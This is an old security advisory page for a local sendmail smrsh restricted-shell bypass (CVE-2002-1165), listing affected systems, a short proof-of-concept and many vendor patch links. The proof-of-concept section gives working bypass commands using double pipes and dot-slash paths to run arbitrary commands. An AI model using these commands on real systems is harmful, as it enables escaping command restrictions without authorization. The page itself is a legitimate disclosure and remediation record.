Sendmail SMRSH Double Pipe Access Validation Vulnerability
BID:5845
Info
Sendmail SMRSH Double Pipe Access Validation Vulnerability
| Bugtraq ID: | 5845 |
| Class: | Access Validation Error |
| CVE: |
CVE-2002-1165 |
| Remote: | No |
| Local: | Yes |
| Published: | Oct 01 2002 12:00AM |
| Updated: | Jul 11 2009 05:06PM |
| Credit: | Vulnerability discovery credited to zen-parse <[email protected]>. |
| Vulnerable: |
Sendmail Consortium Sendmail 8.12.6 Sendmail Consortium Sendmail 8.12.5 Sendmail Consortium Sendmail 8.12.4 Sendmail Consortium Sendmail 8.12.3 Sendmail Consortium Sendmail 8.12.2 Sendmail Consortium Sendmail 8.12.1 Sendmail Consortium Sendmail 8.12 .0 Sendmail Consortium Sendmail 8.11.6 Sendmail Consortium Sendmail 8.11.5 Sendmail Consortium Sendmail 8.11.4 Sendmail Consortium Sendmail 8.11.3 Sendmail Consortium Sendmail 8.11.2 Sendmail Consortium Sendmail 8.11.1 Sendmail Consortium Sendmail 8.11 Sendmail Consortium Sendmail 8.10.2 Sendmail Consortium Sendmail 8.10.1 Sendmail Consortium Sendmail 8.10 Sendmail Consortium Sendmail 8.9.3 Sendmail Consortium Sendmail 8.8.8 OpenBSD OpenBSD 2.9 OpenBSD OpenBSD 2.8 OpenBSD OpenBSD 2.7 OpenBSD OpenBSD 2.6 OpenBSD OpenBSD 2.5 OpenBSD OpenBSD 2.4 OpenBSD OpenBSD 2.3 OpenBSD OpenBSD 2.2 OpenBSD OpenBSD 2.1 OpenBSD OpenBSD 3.2 OpenBSD OpenBSD 3.1 OpenBSD OpenBSD 3.0 NetBSD NetBSD 1.6 NetBSD NetBSD 1.5.3 NetBSD NetBSD 1.5.2 NetBSD NetBSD 1.5.1 NetBSD NetBSD 1.5 HP HP-UX 11.22 HP HP-UX 11.11 HP HP-UX 11.0 4 HP HP-UX 11.0 FreeBSD FreeBSD 4.6 FreeBSD FreeBSD 4.5 FreeBSD FreeBSD 4.4 FreeBSD FreeBSD 4.3 Caldera OpenLinux Workstation 3.1.1 Caldera OpenLinux Workstation 3.1 Caldera OpenLinux Server 3.1.1 Caldera OpenLinux Server 3.1 |
| Not Vulnerable: | |
Discussion
Sendmail SMRSH Double Pipe Access Validation Vulnerability
Sendmail is a freely available, open source mail transport agent. It is maintained and distributed by the Sendmail Consortium. Sendmail is available for the Unix and Linux operating systems.
smrsh is designed to prevent the execution of commands outside of the restricted environment. However, when commands are entered using either double pipes (||) or a mixture of dot (.) and slash (/) characters, a user may be able to bypass the checks performed by smrsh. This could lead to the execution of commands outside of the restricted environment.
Sendmail is a freely available, open source mail transport agent. It is maintained and distributed by the Sendmail Consortium. Sendmail is available for the Unix and Linux operating systems.
smrsh is designed to prevent the execution of commands outside of the restricted environment. However, when commands are entered using either double pipes (||) or a mixture of dot (.) and slash (/) characters, a user may be able to bypass the checks performed by smrsh. This could lead to the execution of commands outside of the restricted environment.
Exploit / POC
Sendmail SMRSH Double Pipe Access Validation Vulnerability
$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute
OR one of the following types of commands:
smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"
$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute
OR one of the following types of commands:
smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"
Solution / Fix
Sendmail SMRSH Double Pipe Access Validation Vulnerability
Solution:
OpenBSD has released patches for OpenBSD 3.0, 3.1 and 3.2 systems.
NetBSD has released an advisory. Users are advised to upgrade the smrsh binary.
Users of NetBSD-current are advised to upgrade to NetBSD-current dated 2002-10-04 or later. Users of NetBSD 1.6 are advised to upgrade from NetBSD 1.6 sources dated 2002-10-04 or later. Users of NetBSD 1.5 through 1.5.3 from NetBSD 1.5.* sources dated 2002-10-04 or later. Further details are available in the referenced advisory.
Users of Gentoo Linux are advised to upgrade using the following commands:
emerge rsync
emerge sendmail
emerge clean
Conectiva has released an advisory.
FreeBSD has released an advisory. Users are advised to upgrade vulnerable systems to the 4.7-STABLE branch, or to the appropriate RELENG_4_x branch after the correction date. A patch is also available. Further details may be found in the referenced advisory.
Mandrake has released a security advisory (MDKSA-2002:083). Fixes for Mandrake Linux are now available.
SGI has released an advisory. Users are advised to upgrade to IRIX 6.5.19 when available or to install the appropriate patch. Further information is available in the referenced advisory.
Apple has addressed this issue in MacOS X 10.2.4/MacOS X Server 10.2.4. Users are advised to upgrade.
HP has released a revised version of their advisory (HPSBUX0212-234) which has been updated to include fix information. Users are advised to upgrade as soon as possible. An upgrade for HP-UX 11.00 and 11.11 has also be made available online and can be accessed using the following link:
http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=SMAIL811
Fixes are available.
OpenBSD OpenBSD 3.2
OpenBSD OpenBSD 3.0
OpenBSD OpenBSD 3.1
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 11.11
HP HP-UX 11.22
Caldera OpenLinux Server 3.1
Caldera OpenLinux Workstation 3.1
Caldera OpenLinux Server 3.1.1
Caldera OpenLinux Workstation 3.1.1
FreeBSD FreeBSD 4.4
FreeBSD FreeBSD 4.5
FreeBSD FreeBSD 4.6
Sendmail Consortium Sendmail 8.11
Sendmail Consortium Sendmail 8.11.1
Sendmail Consortium Sendmail 8.11.4
Sendmail Consortium Sendmail 8.11.6
Sendmail Consortium Sendmail 8.12 .0
Sendmail Consortium Sendmail 8.12.1
Sendmail Consortium Sendmail 8.12.2
Sendmail Consortium Sendmail 8.12.3
Sendmail Consortium Sendmail 8.12.4
Sendmail Consortium Sendmail 8.12.5
Sendmail Consortium Sendmail 8.12.6
Solution:
OpenBSD has released patches for OpenBSD 3.0, 3.1 and 3.2 systems.
NetBSD has released an advisory. Users are advised to upgrade the smrsh binary.
Users of NetBSD-current are advised to upgrade to NetBSD-current dated 2002-10-04 or later. Users of NetBSD 1.6 are advised to upgrade from NetBSD 1.6 sources dated 2002-10-04 or later. Users of NetBSD 1.5 through 1.5.3 from NetBSD 1.5.* sources dated 2002-10-04 or later. Further details are available in the referenced advisory.
Users of Gentoo Linux are advised to upgrade using the following commands:
emerge rsync
emerge sendmail
emerge clean
Conectiva has released an advisory.
FreeBSD has released an advisory. Users are advised to upgrade vulnerable systems to the 4.7-STABLE branch, or to the appropriate RELENG_4_x branch after the correction date. A patch is also available. Further details may be found in the referenced advisory.
Mandrake has released a security advisory (MDKSA-2002:083). Fixes for Mandrake Linux are now available.
SGI has released an advisory. Users are advised to upgrade to IRIX 6.5.19 when available or to install the appropriate patch. Further information is available in the referenced advisory.
Apple has addressed this issue in MacOS X 10.2.4/MacOS X Server 10.2.4. Users are advised to upgrade.
HP has released a revised version of their advisory (HPSBUX0212-234) which has been updated to include fix information. Users are advised to upgrade as soon as possible. An upgrade for HP-UX 11.00 and 11.11 has also be made available online and can be accessed using the following link:
http://www.software.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=SMAIL811
Fixes are available.
OpenBSD OpenBSD 3.2
-
OpenBSD 003_smrsh.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/003_smrsh.patch
OpenBSD OpenBSD 3.0
-
OpenBSD 034_smrsh.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.0/common/034_smrsh.patch
OpenBSD OpenBSD 3.1
-
OpenBSD 017_smrsh.patch
ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.1/common/017_smrsh.patch
HP HP-UX 11.0 4
-
HP smrsh.1100
ftp://smrsh:[email protected]/
HP HP-UX 11.0
-
HP smrsh.1100
ftp://smrsh:[email protected]/
HP HP-UX 11.11
-
HP smrsh.1111
ftp://smrsh:[email protected]/
HP HP-UX 11.22
-
HP PHNE_28409
http://itrc.hp.com -
HP smrsh.1122
ftp://smrsh:[email protected]/
Caldera OpenLinux Server 3.1
-
SCO sendmail-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-052.0/RPM S/sendmail-8.11.6-11.i386.rpm -
SCO sendmail-cf-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-052.0/RPM S/sendmail-cf-8.11.6-11.i386.rpm -
SCO sendmail-doc-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Server/CSSA-2002-052.0/RPM S/sendmail-doc-8.11.6-11.i386.rpm
Caldera OpenLinux Workstation 3.1
-
SCO sendmail-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-052. 0/RPMS/sendmail-8.11.6-11.i386.rpm -
SCO sendmail-cf-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-052. 0/RPMS/sendmail-cf-8.11.6-11.i386.rpm -
SCO sendmail-doc-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1/Workstation/CSSA-2002-052. 0/RPMS/sendmail-doc-8.11.6-11.i386.rpm
Caldera OpenLinux Server 3.1.1
-
SCO sendmail-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-052.0/R PMS/sendmail-8.11.6-11.i386.rpm -
SCO sendmail-cf-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-052.0/R PMS/sendmail-cf-8.11.6-11.i386.rpm -
SCO sendmail-doc-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Server/CSSA-2002-052.0/R PMS/sendmail-doc-8.11.6-11.i386.rpm
Caldera OpenLinux Workstation 3.1.1
-
SCO sendmail-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-05 2.0/RPMS/sendmail-8.11.6-11.i386.rpm -
SCO sendmail-cf-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-05 2.0/RPMS/sendmail-cf-8.11.6-11.i386.rpm -
SCO sendmail-doc-8.11.6-11.i386.rpm
ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/Workstation/CSSA-2002-05 2.0/RPMS/sendmail-doc-8.11.6-11.i386.rpm
FreeBSD FreeBSD 4.4
-
FreeBSD smrsh.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:41/smrsh.patch
FreeBSD FreeBSD 4.5
-
FreeBSD smrsh.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:41/smrsh.patch
FreeBSD FreeBSD 4.6
-
FreeBSD smrsh.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:41/smrsh.patch
Sendmail Consortium Sendmail 8.11
-
Mandrake sendmail-8.11.0-4.1mdk.i586.rpm
Mandrake Linux 7.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-8.11.0-4.1mdk.src.rpm
Mandrake Linux 7.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-cf-8.11.0-4.1mdk.i586.rpm
Mandrake Linux 7.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-doc-8.11.0-4.1mdk.i586.rpm
Mandrake Linux 7.2
http://www.mandrakesecure.net/en/ftp.php
Sendmail Consortium Sendmail 8.11.1
-
Conectiva sendmail-8.11.6-1U60_1cl.i386.rpm
Fix for 6.0/i386.
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_1cl. i386.rpm -
Conectiva sendmail-cf-8.11.6-1U60_1cl.i386.rpm
Fix for 6.0/i386.
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_1 cl.i386.rpm -
Conectiva sendmail-doc-8.11.6-1U60_1cl.i386.rpm
Fix for 6.0/i386.
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_ 1cl.i386.rpm
Sendmail Consortium Sendmail 8.11.4
-
Conectiva sendmail-8.11.6-1U70_1cl.i386.rpm
Fix for 7.0/i386.
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_1cl. i386.rpm -
Conectiva sendmail-cf-8.11.6-1U70_1cl.i386.rpm
Fix for 7.0/i386.
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_1 cl.i386.rpm -
Conectiva sendmail-doc-8.11.6-1U70_1cl.i386.rpm
Fix for 7.0/i386.
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_ 1cl.i386.rpm
Sendmail Consortium Sendmail 8.11.6
-
Conectiva sendmail-8.11.6-1U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_2cl. i386.rpm -
Conectiva sendmail-8.11.6-1U60_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_2cl .src.rpm -
Conectiva sendmail-8.11.6-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_2cl. i386.rpm -
Conectiva sendmail-8.11.6-1U70_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_2cl .src.rpm -
Conectiva sendmail-8.11.6-2U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-8.11.6-2U80_1cl.i3 86.rpm -
Conectiva sendmail-8.11.6-2U80_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/sendmail-8.11.6-2U80_1cl.s rc.rpm -
Conectiva sendmail-cf-8.11.6-1U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_2 cl.i386.rpm -
Conectiva sendmail-cf-8.11.6-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_2 cl.i386.rpm -
Conectiva sendmail-cf-8.11.6-2U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-cf-8.11.6-2U80_1cl .i386.rpm -
Conectiva sendmail-doc-8.11.6-1U60_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_ 2cl.i386.rpm -
Conectiva sendmail-doc-8.11.6-1U70_2cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_ 2cl.i386.rpm -
Conectiva sendmail-doc-8.11.6-2U80_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-doc-8.11.6-2U80_1c l.i386.rpm -
Mandrake sendmail-8.11.6-4.1mdk.i586.rpm
Mandrake Linux 8.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-8.11.6-4.1mdk.ppc.rpm
Mandrake Linux 8.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-8.11.6-4.1mdk.src.rpm
Mandrake Linux 8.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-8.11.6-4.2mdk.i586.rpm
Mandrake Linux 8.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-8.11.6-4.2mdk.ia64.rpm
Mandrake Linux 8.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-8.11.6-4.2mdk.src.rpm
Mandrake Linux 8.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-cf-8.11.6-4.1mdk.i586.rpm
Mandrake Linux 8.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-cf-8.11.6-4.1mdk.ppc.rpm
Mandrake Linux 8.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-cf-8.11.6-4.2mdk.i586.rpm
Mandrake Linux 8.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-cf-8.11.6-4.2mdk.ia64.rpm
Mandrake Linux 8.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-doc-8.11.6-4.1mdk.i586.rpm
Mandrake Linux 8.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-doc-8.11.6-4.1mdk.ppc.rpm
Mandrake Linux 8.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-doc-8.11.6-4.2mdk.i586.rpm
Mandrake Linux 8.1
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-doc-8.11.6-4.2mdk.ia64.rpm
Mandrake Linux 8.1
http://www.mandrakesecure.net/en/ftp.php
Sendmail Consortium Sendmail 8.12 .0
-
Sendmail Consortium smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.1
-
Mandrake sendmail-8.12.1-4.1mdk.i586.rpm
Mandrake Linux 8.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-8.12.1-4.1mdk.ppc.rpm
Mandrake Linux 8.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-8.12.1-4.1mdk.src.rpm
Mandrake Linux 8.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-cf-8.12.1-4.1mdk.i586.rpm
Mandrake Linux 8.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-cf-8.12.1-4.1mdk.ppc.rpm
Mandrake Linux 8.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-devel-8.12.1-4.1mdk.i586.rpm
Mandrake Linux 8.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-devel-8.12.1-4.1mdk.ppc.rpm
Mandrake Linux 8.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-doc-8.12.1-4.1mdk.i586.rpm
Mandrake Linux 8.2
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-doc-8.12.1-4.1mdk.ppc.rpm
Mandrake Linux 8.2
http://www.mandrakesecure.net/en/ftp.php -
Sendmail Consortium smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.2
-
Apple MacOSX10.2.4Combined.dmg
Update for MacOS X 10.2, 10.2.1 and 10.2.2.
http://docs.info.apple.com/article.html?artnum=70168 -
Apple MacOSX10.2.4Update.dmg
Update for MacOS 10.2.3.
http://docs.info.apple.com/article.html?artnum=70167 -
Apple MacOSXServerUpdate10.2.4.dmg
http://docs.info.apple.com/article.html?artnum=70171#English -
Sendmail Consortium smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.3
-
Sendmail Consortium smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.4
-
Sendmail Consortium smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.5
-
Sendmail Consortium smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch
Sendmail Consortium Sendmail 8.12.6
-
Mandrake sendmail-8.12.6-3.1mdk.i586.rpm
Mandrake Linux 9.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-8.12.6-3.1mdk.src.rpm
Mandrake Linux 9.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-cf-8.12.6-3.1mdk.i586.rpm
Mandrake Linux 9.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-devel-8.12.6-3.1mdk.i586.rpm
Mandrake Linux 9.0
http://www.mandrakesecure.net/en/ftp.php -
Mandrake sendmail-doc-8.12.6-3.1mdk.i586.rpm
Mandrake Linux 9.0
http://www.mandrakesecure.net/en/ftp.php -
Sendmail Consortium smrsh-20020924.patch
http://www.sendmail.org/patches/smrsh-20020924.patch
References
Sendmail SMRSH Double Pipe Access Validation Vulnerability
References:
References:
- Security Updates (Apple)
- Sendmail Homepage (Sendmail Consortium)